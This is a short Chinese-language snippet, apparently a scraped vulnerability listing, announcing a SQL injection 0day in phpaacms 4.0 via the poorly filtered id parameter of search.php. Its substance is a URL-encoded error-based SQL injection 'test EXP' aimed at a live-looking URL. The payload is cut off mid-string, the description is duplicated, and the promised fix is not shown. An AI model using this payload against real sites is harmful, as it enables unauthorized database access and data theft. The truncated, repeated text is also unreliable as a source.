phpaacms 4.0 Sql 注入0day漏洞及修复
phpaacms是一套免费开源的简洁文章管理系统cms. 漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射 测试EXP: https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELEC...
phpaacms是一套免费开源的简洁文章管理系统cms. 漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射 测试EXP: https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELEC...